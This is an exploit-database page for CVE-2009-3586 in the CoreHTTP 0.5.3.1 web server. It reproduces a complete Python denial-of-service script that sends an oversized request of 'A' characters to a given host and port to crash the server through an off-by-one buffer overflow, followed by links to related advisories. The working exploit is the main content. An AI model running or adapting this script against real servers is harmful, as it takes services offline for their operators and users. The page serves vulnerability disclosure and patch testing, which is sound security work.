Lucene search
Patroklos ArgyroudisPACKETSTORM:83483HistoryDec 07, 2009 - 12:00 a.m.
CoreHTTP 0.5.3.1 Buffer Overflow
2009-12-0700:00:00
Patroklos Argyroudis
packetstormsecurity.com
26
0.023 Low
EPSS
Percentile
88.5%
`#!/usr/bin/env python
# corex.py -- Patroklos Argyroudis, argp at domain census-labs.com
#
# Denial of service exploit for CoreHTTP web server version <= 0.5.3.1:
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3586
#
# For a detailed analysis see:
#
# http://census-labs.com/news/2009/12/02/corehttp-web-server/
import os
import sys
import socket
def main(argv):
argc = len(argv)
if argc != 3:
print "usage: %s <host> <port>" % (argv[0])
sys.exit(0)
host = argv[1]
port = int(argv[2])
print "[*] target: %s:%d" % (host, port)
payload = "A" * 257 + "/index.html HTTP/1.1\r\n\r\n"
print "[*] payload: %s" % (payload)
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.connect((host, port))
sd.send(payload)
sd.close()
if __name__ == "__main__":
main(sys.argv)
sys.exit(0)
# EOF
`
Related
openvas
openvas
CoreHTTP 'src/http.c ' Buffer Overflow Vulnerability
2009-12-08 00:00:00
CoreHTTP 'src/http.c ' Buffer Overflow Vulnerability
2009-12-08 00:00:00
securityvulns
securityvulns
CoreHTTP Web server buffer overflow
2009-12-08 00:00:00
CVE-2009-3586: CoreHTTP web server off-by-one buffer overflow vulnerability
2009-12-08 00:00:00
seebug
seebug
CoreHTTP web server off-by-one buffer overflow vulnerability
2009-12-02 00:00:00
exploitpack
exploitpack
CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow
2009-12-02 00:00:00
prion
prion
Buffer overflow
2009-12-08 18:30:00
cve
cve
CVE-2009-3586
2009-12-08 18:30:00
exploitdb
exploitdb
CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow
2009-12-02 00:00:00